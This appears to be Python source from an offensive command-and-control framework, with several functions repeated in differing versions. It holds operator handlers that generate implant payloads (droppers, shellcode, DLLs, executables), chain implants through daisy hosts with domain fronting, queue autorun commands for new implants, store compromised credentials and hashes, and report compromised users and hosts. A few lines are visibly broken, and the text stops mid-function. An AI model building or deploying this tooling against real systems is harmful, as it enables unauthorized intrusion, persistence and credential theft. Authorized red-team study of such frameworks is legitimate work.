def do_get_opsec_events(user, command):
    """Print the stored OpSec event log as a whitespace-separated table, then pause.

    Rows come from get_opsec_events() and are read positionally as
    (id, date, owner, event, note). When there are no rows nothing is
    printed, but the "Press Enter" pause and screen clear still run.
    `user` and `command` are accepted for handler-signature uniformity
    and are not used.
    """
    rows = get_opsec_events()
    if rows:
        table = ["ID Date Owner Event Note \n"]
        for row in rows:
            table.append(f"{row[0]} {row[1]} {row[2]} {row[3]} {row[4]} \n")
        print_good("".join(table))
    input("Press Enter to continue...")
    clear()
def do_add_autorun(user, command):
    """Store a command to be queued automatically for every new implant.

    Everything after "add-autorun " is persisted verbatim via add_autorun();
    no validation of the module/command text happens here, so a typo is
    only discovered when the first implant runs it. A bare "add-autorun"
    is rejected.
    """
    if command == "add-autorun":
        print_bad("Please specify a module to autorun")
        return
    autorun = command.replace("add-autorun ", "").replace("add-autorun", "")
    add_autorun(autorun)
    print_good("add-autorun: %s\r\n" % autorun)
    input("Press Enter to continue...")
    clear()
def do_set_killdate(user, command):
    """Update the C2Server KillDate after validating the yyyy-MM-dd format.

    The new value only affects payloads generated afterwards; implants
    already deployed keep the kill date they were built with (hence the
    reminder in the success message).
    """
    candidate = command.replace("set-killdate ", "").replace("set-killdate", "").strip()
    if validate_killdate(candidate):
        update_item("KillDate", "C2Server", candidate)
        print_good("Updated KillDate (Remember to generate new payloads and get new implants): %s\r\n" % candidate)
    else:
        print_bad("Invalid killdate format, please specify a killdate in format yyyy-MM-dd")
    input("Press Enter to continue...")
    clear()
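def do_set_defaultbeacon(user, command):
    """Update the C2Server DefaultSleep (beacon interval) after validation.

    Fix: the extracted value is now stripped of surrounding whitespace, the
    same way do_set_killdate does, so "set-defaultbeacon 5m " no longer
    passes a value with a trailing space to validate_sleep_time/update_item.

    The change requires a C2 server restart to take effect (per the
    success message).
    """
    new_sleep = command.replace("set-defaultbeacon ", "").replace("set-defaultbeacon", "").strip()
    if not validate_sleep_time(new_sleep):
        print_bad("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
    else:
        update_item("DefaultSleep", "C2Server", new_sleep)
        print_good("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep)
    input("Press Enter to continue...")
    clear()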
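def do_createdaisypayload(user, command):
    """Interactively build payloads that call back via an existing daisy implant.

    Fixes versus the original:
    - `daisyhostheader` and its counter loop were computed and never used;
      they are removed.
    - A daisy host ID that does not resolve to an implant now fails with a
      message instead of an AttributeError on `daisyhost.User`
      (assumes get_implantbyid returns a falsy value for an unknown ID —
      TODO confirm).

    The URL record is created against the C2's own PayloadCommsHost /
    DomainFrontHeader, not the daisy URL entered here; the daisy URL is
    only used to patch the PowerShell dropper.
    """
    name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    daisyurl = input(f"Daisy URL: e.g. {default_url} ")
    # 127.0.0.1 is normalised to localhost so the dropper string matches the
    # form the daisy module uses (behaviour kept from the original).
    daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
    daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
    daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
    daisyhost = get_implantbyid(daisyhostid)
    if not daisyhost:
        print_bad("No implant found for ID %s" % daisyhostid)
        input("Press Enter to continue...")
        clear()
        return
    # Tell the dropper to use no system proxy unless one was configured.
    proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
    daisyurl, _ = string_to_array(daisyurl)
    C2 = get_c2server_all()
    urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
    newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer,
                          "%s?d" % get_newimplanturl(), PayloadsDirectory,
                          PowerShellProxyCommand=proxynone, URLID=urlId,
                          PBindPipeName=PBindPipeName, PBindSecret=PBindSecret)
    # Rewrite the dropper's URL marker to the daisy host's user@domain.
    newPayload.PSDropper = newPayload.PSDropper.replace(
        "$pid;%s" % daisyurl, "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
    prefix = "%s_" % name
    for build in (newPayload.CreateDroppers, newPayload.CreateShellcode, newPayload.CreateRaw,
                  newPayload.CreateDlls, newPayload.CreateEXE, newPayload.CreateMsbuild,
                  newPayload.CreateDonutShellcode, newPayload.BuildDynamicPayloads):
        build(prefix)
    print_good("Created new %s daisy payloads" % name)
    input("Press Enter to continue...")
    clear()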
def do_createnewpayload(user, command, creds=None):
    """Build a full payload set for a single comms URL (older, index-based variant).

    Optional "-credid" selects stored credentials for the proxy; hash-only
    credentials are refused because the proxy needs a cleartext password.
    Proxy credentials are persisted with the URL record via new_urldetails.

    NOTE(review): the proxy-user format string appears masked as "******"
    in this listing; as written, "******" % (a, b) raises TypeError
    (no conversion targets) — confirm against upstream before relying on
    the -credid path.
    """
    params = re.compile("createnewpayload ", re.IGNORECASE).sub("", command)
    creds = None
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
        if not creds['Password']:
            print_bad("This command does not support credentials with hashes")
            input("Press Enter to continue...")
            clear()
            return
    name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
    comms_url = input("Comms URL: https://www.example.com ")
    # Scheme-stripped host; computed but not consumed below (kept as-is).
    domain = comms_url.lower().replace('https://', '').replace('http://', '')
    domainfront = input("Domain front hostname: jobs.azureedge.net ")
    proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
    randomid = randomuri(5)
    proxyuser = ""
    proxypass = ""
    credsexpire = ""
    if proxyurl:
        if creds is not None:
            proxyuser = "******" % (creds['Domain'], creds['Username'])
            proxypass = creds['Password']
        else:
            proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
            proxypass = input("Proxy Password: e.g. Password1 ")
        credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ")
        imurl = "%s?p" % get_newimplanturl()
    else:
        imurl = get_newimplanturl()
    C2 = get_c2server_all()
    newPayload = Payloads(C2[5], C2[2], comms_url, domainfront, C2[8], proxyuser, proxypass,
                          proxyurl, "", "", C2[17], C2[18], C2[19], imurl, PayloadsDirectory)
    prefix = "%s_" % name
    for build in (newPayload.CreateRaw, newPayload.CreateDlls, newPayload.CreateShellcode,
                  newPayload.CreateEXE, newPayload.CreateMsbuild, newPayload.CreatePython,
                  newPayload.CreateCS):
        build(prefix)
    new_urldetails(randomid, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
    print_good("Created new payloads")
    input("Press Enter to continue...")
    clear()
def do_tasks(user, command):
    """List queued (not yet collected) tasks, one per line, then pause.

    Rows are read positionally: task[1] is the implant key passed to
    get_implantdetails, task[2] the command text; implant details are
    indexed as [0]=id, [2]=user, [11]=domain.
    """
    tasks = get_newtasks_all()
    if tasks is None:
        print_good("No tasks queued!\r\n")
    else:
        lines = []
        for task in tasks:
            details = get_implantdetails(task[1])
            who = "%s\\%s" % (details[11], details[2])
            lines.append("[%s] : %s | %s\r\n" % (details[0], who, task[2]))
        print_good("Queued tasks:\r\n\r\n%s" % "".join(lines))
    input("Press Enter to continue...")
    clear()
def do_show_serverinfo(user, command):
    """Dump the C2Server configuration row to the console, then pause.

    SECURITY NOTE: this prints secrets in clear — EncKey, the default proxy
    password and the Pushover API token. Be aware of screen sharing,
    terminal logging and recorded sessions when running it.
    """
    C2 = get_c2server_all()
    fields = [
        ("PayloadCommsHost", C2.PayloadCommsHost),
        ("EncKey", C2.EncKey),
        ("DomainFrontHeader", C2.DomainFrontHeader),
        ("DefaultSleep", C2.DefaultSleep),
        ("KillDate", C2.KillDate),
        ("GET_404_Response", C2.GET_404_Response),
        ("PoshProjectDirectory", C2.PoshProjectDirectory),
        ("QuickCommand", C2.QuickCommand),
        ("DownloadURI", C2.DownloadURI),
        ("DefaultProxyURL", C2.ProxyURL),
        ("DefaultProxyUser", C2.ProxyUser),
        ("DefaultProxyPass", C2.ProxyPass),
        ("URLS", C2.URLS),
        ("SocksURLS", C2.SocksURLS),
        ("Insecure", C2.Insecure),
        ("UserAgent", C2.UserAgent),
        ("Referer", C2.Referrer),
        ("Pushover_APIToken", C2.Pushover_APIToken),
        ("Pushover_APIUser", C2.Pushover_APIUser),
        ("EnableNotifications", C2.EnableNotifications),
    ]
    report = "\n" + "".join(f"{label}: {value}\n" for label, value in fields)
    print_good(report)
    input("Press Enter to continue...")
    clear()
def do_tasks(user, command):
    """List queued (not yet collected) tasks with implant, command and task ID.

    Attribute-based variant: each task row exposes RandomURI, Command and
    TaskID; the implant record exposes ImplantID, Domain and User.
    """
    tasks = get_newtasks_all()
    if tasks is None:
        print_good("No tasks queued!\r\n")
    else:
        lines = []
        for task in tasks:
            details = get_implantdetails(task.RandomURI)
            lines.append(
                f"[{details.ImplantID}] : {details.Domain}\\{details.User} | {task.Command} : {task.TaskID}\r\n")
        print_good("Queued tasks:\r\n\r\n%s" % "".join(lines))
    input("Press Enter to continue...")
    clear()
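def do_opsec(user, command):
    """Summarise the operation's footprint (users, hosts, URLs, uploads, creds) and OpSec events.

    Fixes versus the original:
    - The `-target` regex could return no match while the command still
      contained "invoke-pbind" and the output "connected"; `tg[0]` then
      raised TypeError. The match is now checked first.
    - Task command/output columns are treated as possibly None before
      `.lower()` (assumes empty output may be stored as NULL — TODO confirm).
    - The `command` parameter is no longer rebound inside the loop; the
      original passed the last task's lowercased command on to
      do_get_opsec_events, which ignores it anyway.

    The upload/persistence/SCF lines are parsed out of free-text task
    records by substring matching, so the summary is only as reliable as
    those message formats.
    """
    implants = get_implants_all()
    comtasks = get_tasks()
    hosts = ""
    uploads = ""
    users = ""
    urls = get_c2urls()
    urlformatted = "ID Name URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n"
    for u in urls:
        urlformatted += "%s %s %s %s %s %s %s %s \n" % (u[0], u[1], u[2], u[3], u[4], u[5], u[6], u[7])
    if implants:
        for implant in implants:
            if implant.Hostname not in hosts:
                hosts += "%s \n" % implant.Hostname
    if comtasks:
        for task in comtasks:
            implant = get_implantdetails(task[1])
            task_cmd = (task[2] or "").lower()
            task_out = (task[3] or "").lower()
            if implant.User not in users:
                users += "%s\\%s @ %s\n" % (implant.Domain, implant.User, implant.Hostname)
            # A successful PBind connection means a further host was touched.
            if "invoke-pbind" in task_cmd and "connected" in task_out:
                tg = re.search(r"(?<=-target )\S*", task_cmd)
                if tg and tg[0] not in hosts:
                    hosts += "%s \n" % tg[0]
            if "uploading file" in task_cmd:
                uploadedfile = task_cmd.partition("uploading file: ")[2].strip()
                filehash = uploadedfile.partition(" with md5sum:")[2].strip()
                uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip().strip('"')
                uploads += "%s\t%s\t%s\n" % (implant.User, filehash, uploadedfile)
            if "installing persistence" in task_out:
                line = task_cmd.replace('\n', '').replace('\r', '')
                # partition() yields "" instead of IndexError when no ":" is present
                filenameuploaded = line.rstrip().partition(":")[2]
                uploads += "%s %s \n" % (implant.User, filenameuploaded)
            if "written scf file" in task_out:
                uploads += "%s %s \n" % (implant.User, task_out)
    creds, hashes = parse_creds(get_creds())
    print_good(
        "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s"
        % (users, hosts, urlformatted, uploads, creds, hashes))
    print_good("\nOpSec Events:")
    do_get_opsec_events(user, command)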
def do_insert_opsec_events(user, command):
    """Prompt for a timestamp, event and note, store them, then show the event log.

    The timestamp defaults to the current local time in "%Y-%m-%d %H:%M"
    (naive, no timezone) and is validated with validate_timestamp_string
    before insertion. The calling operator's name (`user`) is recorded as
    the event owner.
    """
    fmt = "%Y-%m-%d %H:%M"
    default_ts = datetime.now().strftime(fmt)
    timestamp = input(f"Timestamp: (Press Enter for {default_ts}) ").strip() or default_ts
    if not validate_timestamp_string(timestamp, fmt):
        print_bad("Please enter a valid timestamp in format yyyy-mm-dd HH:MM")
        input("Press Enter to continue...")
        clear()
        return
    event = input("Event: ")
    note = input("Notes: ")
    insert_opsec_event(timestamp, user, event, note)
    print_good("Event added successfully")
    do_get_opsec_events(user, command)
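def do_opsec(user, command):
    """Summarise the operation's footprint (older, index-based variant).

    Fixes versus the original:
    - `output.indexof(':')` is not a str method (AttributeError whenever a
      "written scf file" record was present); replaced with find() and a
      fallback to the whole output when no ":" exists.
    - The persistence/SCF branches looked the implant up with `t[2]` (the
      command text) instead of `t[1]` (the implant key used everywhere
      else); they now reuse the record already fetched for this task.
    - A missing "-target" match no longer raises on `tg[0]`.
    - Command/output columns are guarded against None before `.lower()`
      (assumes empty output may be stored as NULL — TODO confirm).
    - `implants`/`comtasks` of None no longer raise in the for-loops.

    Row layout (positional): implants [3]=hostname, [9]=url; implant
    details [2]=user, [3]=hostname, [11]=domain; tasks [1]=implant key,
    [2]=command, [3]=output.
    """
    implants = get_implants_all()
    comtasks = get_tasks()
    hosts = ""
    uploads = ""
    urls = ""
    users = ""
    for i in implants or []:
        if i[3] not in hosts:
            hosts += "%s \n" % i[3]
        if i[9] not in urls:
            urls += "%s \n" % i[9]
    for t in comtasks or []:
        hostname = get_implantdetails(t[1])
        task_cmd = (t[2] or "").lower()
        task_out = (t[3] or "").lower()
        if hostname[2] not in users:
            users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3])
        if "invoke-pbind" in task_cmd and "connected" in task_out:
            tg = re.search(r"(?<=-target )\S*", task_cmd)
            if tg and tg[0] not in hosts:
                hosts += "%s \n" % tg[0]
        if "uploading file" in task_cmd:
            uploadedfile = task_cmd.partition("uploading file: ")[2].strip()
            filehash = uploadedfile.partition(" with md5sum:")[2].strip()
            uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip().strip('"')
            uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile)
        if "installing persistence" in task_out:
            line = task_cmd.replace('\n', '').replace('\r', '')
            filenameuploaded = line.rstrip().partition(":")[2]
            uploads += "%s %s \n" % (hostname[3], filenameuploaded)
        if "written scf file" in task_out:
            colon = task_out.find(':')
            detail = task_out[colon:] if colon >= 0 else task_out
            uploads += "%s %s\n" % (hostname[3], detail)
    creds, hashes = parse_creds(get_creds())
    print_good(
        "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s"
        % (users, hosts, urls, uploads, creds, hashes))
    input("Press Enter to continue...")
    clear()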
def do_add_hosted_file(user, command):
    """Register a local file to be served by the C2 at the given URI, then list hosted files.

    Content type defaults to text/html; the file may optionally be served
    base64-encoded. The record is inserted active ("Yes").

    NOTE(review): neither the path nor the URI is validated here — the
    file is not checked to exist, and nothing constrains it to a
    payloads/downloads directory. Whatever path is entered is what the
    hosting handler will later read; double-check before serving anything
    outside the project tree.
    """
    FilePath = input("File Path: .e.g. /tmp/application.docx: ")
    URI = input("URI Path: .e.g. /downloads/2020/application: ")
    ContentType = input("Content Type: .e.g. (text/html): ") or "text/html"
    Base64 = "Yes" if no_yes_prompt("Base64 Encode File") else "No"
    if not (URI and FilePath):
        print_bad("Please enter a FilePath and URI")
        input("Press Enter to continue...")
        clear()
        return
    insert_hosted_file(URI, FilePath, ContentType, Base64, "Yes")
    FirstURL = get_first_url(select_item("PayloadCommsHost", "C2Server"),
                             select_item("DomainFrontHeader", "C2Server"))
    print_good("Added hosted-file \n\n%s%s -> %s (%s)\r\n" % (FirstURL, URI, FilePath, ContentType))
    do_show_hosted_files(user, command)
    clear()
def do_createproxypayload(user, command, creds=None):
    """Build the "Proxy" payload set after collecting/saving proxy settings.

    Optional "-credid" pulls stored credentials (cleartext password
    required). The proxy URL, user and password are written into the
    C2Server table before payload generation and also recorded with the
    URL details.

    SECURITY NOTE: the proxy password is persisted in the C2 database in
    clear and becomes visible via show-serverinfo.

    NOTE(review): the proxy-user format string appears masked as "******"
    in this listing; as written, "******" % (a, b) raises TypeError —
    confirm against upstream before relying on the -credid path.
    """
    params = re.compile("createproxypayload ", re.IGNORECASE).sub("", command)
    creds = None
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
        if not creds['Password']:
            print_bad("This command does not support credentials with hashes")
            input("Press Enter to continue...")
            clear()
            return
    if creds is not None:
        proxyuser = "******" % (creds['Domain'], creds['Username'])
        proxypass = creds['Password']
    else:
        proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
        proxypass = input("Proxy Password: e.g. Password1 ")
    proxyurl = input(Colours.GREEN + "Proxy URL: .e.g. http://10.150.10.1:8080 ")
    credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
    for key, value in (("ProxyURL", proxyurl), ("ProxyUser", proxyuser), ("ProxyPass", proxypass)):
        update_item(key, "C2Server", value)
    C2 = get_c2server_all()
    newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "",
                          C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
    for build in (newPayload.CreateRaw, newPayload.CreateDlls, newPayload.CreateShellcode,
                  newPayload.CreateEXE, newPayload.CreateMsbuild, newPayload.CreateCS):
        build("Proxy")
    new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire)
    print_good("Created new proxy payloads")
    input("Press Enter to continue...")
    clear()
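def _cred_flag(command, flag):
    """Return the value of `-<flag>=<value>` in command (up to whitespace), else None."""
    match = re.search(r"-%s=([^\s]*)" % flag, command)
    return match.group(1) if match else None


def do_creds(user, command):
    """Add, search or list stored credentials.

    Forms:
      creds -add -domain=D -username=U (-password=P | -hash=H)
      creds -search <username>
      creds                      (list everything)

    Changes versus the original: the four flag extractions go through one
    helper; the redundant second `-password=` search in the else-branch
    (which could only re-yield None) is gone; the local `hash` no longer
    shadows the builtin.

    SECURITY NOTE: values are taken from the command line, so a password
    or hash typed here lands in the command history (see `history`).
    The `[^\\s]*` capture also means a password containing whitespace
    cannot be added this way.
    """
    if "-add " in command:
        domain = _cred_flag(command, "domain")
        username = _cred_flag(command, "username")
        password = _cred_flag(command, "password")
        cred_hash = _cred_flag(command, "hash")
        if not domain or not username:
            print_bad("Please specify a domain and username")
            return
        if password and cred_hash:
            print_bad("Please specify a password or a hash, but not both")
            return
        if not password and not cred_hash:
            print_bad("Please specify either a password or a hash")
            return
        insert_cred(domain, username, password, cred_hash)
        print_good("Credential added successfully")
        return
    if "-search " in command:
        username = command.replace("creds ", "").replace("-search ", "").strip()
        creds, hashes = parse_creds(get_creds_for_user(username))
        print_good("Credentials Compromised: \n%s\nHashes Compromised: \n%s" % (creds, hashes))
        return
    creds, hashes = parse_creds(get_creds())
    print_good("\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (creds, hashes))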
def do_cleartasks(user, command):
    """Drop every queued task, then pause.

    Destructive and unconfirmed: all pending tasks for all implants are
    discarded immediately.
    """
    drop_newtasks()
    print_good("Emptied tasks queue\r\n")
    input("Press Enter to continue...")
    clear()
def do_turnon_notifications(user, command):
    """Set C2Server.EnableNotifications to "Yes" (new-implant alerts), then pause."""
    update_item("EnableNotifications", "C2Server", "Yes")
    print_good("Turned on notifications on new implant")
    input("Press Enter to continue...")
    clear()
def do_nuke_autoruns(user, command):
    """Delete all configured autorun commands without confirmation, then pause."""
    del_autoruns()
    print_good("nuked autoruns\r\n")
    input("Press Enter to continue...")
    clear()
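def do_del_autorun(user, command):
    """Delete one autorun entry identified by the text after "del-autorun ".

    Fix: a bare "del-autorun" (no argument) is now rejected, matching
    do_add_autorun; previously the literal string "del-autorun" was passed
    to del_autorun as the entry to remove.
    """
    if command.strip() == "del-autorun":
        print_bad("Please specify an autorun to delete")
        return
    autorun = command.replace("del-autorun ", "")
    del_autorun(autorun)
    print_good("deleted autorun\r\n")
    input("Press Enter to continue...")
    clear()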
def do_list_autoruns(user, command):
    """Print the configured autorun entries, then pause."""
    print_good(get_autorun())
    input("Press Enter to continue...")
    clear()
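def _ps_single_quote(value):
    """Return value as a PowerShell single-quoted literal ('' escapes an embedded ')."""
    return "'" + str(value).replace("'", "''") + "'"


def do_startdaisy(user, command, randomuri):
    """Task an implant to run invoke-daisychain and optionally build payloads for it.

    Fixes versus the original:
    - Proxy URL/user/password and the URL list are interpolated into a
      PowerShell command inside single quotes. A value containing a `'`
      (passwords frequently do) broke the command or spliced arbitrary
      PowerShell into it. Those values are now quoted via
      _ps_single_quote(), which doubles embedded quotes.
    - The elevation answer was interpreted twice with different rules
      ("n" → localhost, but only "y"/"" → firewall prompt, so an answer
      like "no" was treated as elevated at the top and non-elevated at the
      bottom). It is evaluated once: anything other than ""/"y"/"yes" is
      treated as not elevated.

    The daisy server's listener address/port and upstream are collected
    interactively; the resulting task is queued for `randomuri` and the
    implant is labelled "DaisyHost".
    """
    check_module_loaded("invoke-daisychain.ps1", randomuri, user)
    elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
    is_elevated = elevated.strip().lower() in ("", "y", "yes")
    domain_front = ""
    proxy_user = ""
    proxy_pass = ""
    proxy_url = ""
    cred_expiry = ""
    if not is_elevated:
        cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
        if cont.lower() == "n" or cont == "":
            return
        bind_ip = "localhost"
    else:
        bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
    bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
    firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    default_df_header = get_first_dfheader(DomainFrontHeader)
    # A front header equal to the URL means "no domain fronting configured".
    if default_df_header == default_url:
        default_df_header = None
    if firstdaisy.lower() == "y" or firstdaisy == "":
        upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END)
        domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END)
        proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
        proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
        proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
        cred_expiry = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ")
        if not upstream_url:
            upstream_url = default_url
        if not domain_front:
            domain_front = default_df_header or ""
    else:
        upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
        upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
        upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
    command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"
    if domain_front:
        command += f" -domfront {domain_front}"
    if proxy_url:
        command += f" -proxyurl {_ps_single_quote(proxy_url)}"
    if proxy_user:
        command += f" -proxyuser {_ps_single_quote(proxy_user)}"
    if proxy_pass:
        command += f" -proxypassword {_ps_single_quote(proxy_pass)}"
    if is_elevated:
        firewall = input(Colours.GREEN + "Add firewall rule? (uses netsh.exe) y/N: ")
        if firewall.lower() == "n" or firewall == "":
            command += " -nofwrule"
    else:
        print_good("Not elevated so binding to localhost and not adding firewall rule")
        command += " -localhost"
    urls = get_allurls()
    command += f" -urls {_ps_single_quote(urls)}"
    new_task(command, user, randomuri)
    update_label("DaisyHost", randomuri)
    createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
    if createpayloads.lower() == "y" or createpayloads == "":
        name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
        daisyhost = get_implantdetails(randomuri)
        proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
        C2 = get_c2server_all()
        urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url,
                               proxy_user, proxy_pass, cred_expiry)
        newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer,
                              "%s?d" % get_newimplanturl(), PayloadsDirectory,
                              URLID=urlId, PowerShellProxyCommand=proxynone)
        # Rewrite the dropper's URL marker to the daisy host's user@domain.
        newPayload.PSDropper = newPayload.PSDropper.replace(
            "$pid;%s" % upstream_url, "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
        for build in (newPayload.CreateDroppers, newPayload.CreateRaw, newPayload.CreateDlls,
                      newPayload.CreateShellcode, newPayload.CreateEXE, newPayload.CreateMsbuild):
            build(name)
        print_good("Created new %s daisy payloads" % name)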
def do_get_killdate(user, command):
    """Print the C2Server KillDate, then pause."""
    print_good(f"KillDate: {select_item('KillDate', 'C2Server')}")
    input("Press Enter to continue...")
    clear()
def do_opsec(user, command):
    """Print the OpSec summary built by get_opsec_string, followed by the event log."""
    summary = get_opsec_string(user, command)
    print_good(summary)
    do_get_opsec_events(user, command)
def do_history(user, command):
    """Print the command history, then pause.

    Note that commands such as `creds -add -password=...` appear here in
    clear, so the history itself is sensitive.
    """
    print_good(get_history())
    input("Press Enter to continue...")
    clear()
def do_show_serverinfo(user, command):
    """Dump C2Server columns 1..22 of the configuration row, then pause.

    SECURITY NOTE: EncKey, the default proxy password and the Pushover API
    token are printed in clear.
    """
    row = get_c2server_all()
    labels = (
        "PayloadCommsHost", "EncKey", "DomainFrontHeader", "DefaultSleep", "KillDate",
        "GET_404_Response", "PoshProjectDirectory", "PayloadCommsPort", "QuickCommand",
        "DownloadURI", "DefaultProxyURL", "DefaultProxyUser", "DefaultProxyPass",
        "EnableSounds", "URLS", "SocksURLS", "Insecure", "UserAgent", "Referer",
        "Pushover_APIToken", "Pushover_APIUser", "EnableNotifications",
    )
    values = [row[k] for k in range(1, 23)]
    report = "\n" + "".join(f"{label}: {value}\n" for label, value in zip(labels, values))
    print_good(report)
    input("Press Enter to continue...")
    clear()
def do_help(user, command):
    """Print the pre-built help text (`pre_help`), then pause."""
    print_good(pre_help)
    input("Press Enter to continue...")
    clear()
def do_show_serverinfo(user, command):
    """Dump C2Server columns 1..24 of the configuration row (oldest schema), then pause.

    SECURITY NOTE: EncKey, the default proxy password, APIKEY and the
    notification API token are printed in clear.
    """
    row = get_c2server_all()
    labels = (
        "HostnameIP", "EncKey", "DomainFrontHeader", "DefaultSleep", "KillDate",
        "HTTPResponse", "FolderPath", "ServerPort", "QuickCommand", "DownloadURI",
        "DefaultProxyURL", "DefaultProxyUser", "DefaultProxyPass", "EnableSounds",
        "APIKEY", "MobileNumber", "URLS", "SocksURLS", "Insecure", "UserAgent",
        "Referer", "APIToken", "APIUser", "EnableNotifications",
    )
    values = [row[k] for k in range(1, 25)]
    report = "\n" + "".join(f"{label}: {value}\n" for label, value in zip(labels, values))
    print_good(report)
    input("Press Enter to continue...")
    clear()
def do_startdaisy(user, command, randomuri):
    """Task an implant with the positional-argument invoke-daisychain (daisy.dll variant).

    NOTE(review): every user-entered value is dropped into a PowerShell
    double-quoted string. A `"`, `$` or backtick in e.g. the proxy
    password will break the command or be expanded by PowerShell before
    invoke-daisychain sees it; no escaping is applied here.
    """
    check_module_loaded("daisy.dll", randomuri, user)
    elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
    domain_front = ""
    proxy_user = ""
    proxy_pass = ""
    proxy_url = ""
    if elevated.lower() == "n":
        cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
        if cont.lower() == "n" or cont == "":
            return
        bind_ip = "localhost"
    else:
        bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
    bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
    firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
    if firstdaisy.lower() == "y" or firstdaisy == "":
        upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {PayloadCommsHost}): " + Colours.END)
        if DomainFrontHeader:
            df_prompt = f"Domain front header (leave blank for {DomainFrontHeader}): "
        else:
            df_prompt = "Domain front header (leave blank for configured value of no header): "
        domain_front = input(Colours.GREEN + df_prompt + Colours.END)
        proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
        proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
        proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
        upstream_url = upstream_url or PayloadCommsHost
        domain_front = domain_front or DomainFrontHeader
    else:
        upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
        upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
        upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
        domain_front = upstream_daisy_host
    urls = get_allurls().replace(" ", "")
    useragent = UserAgent
    command = (f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" \"{upstream_url}\" \"{domain_front}\" "
               f"\"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}")
    new_task(command, user, randomuri)
    update_label("DaisyHost", randomuri)
    createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
    if createpayloads.lower() == "y" or createpayloads == "":
        name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
        daisyhost = get_implantdetails(randomuri)
        proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
        C2 = get_c2server_all()
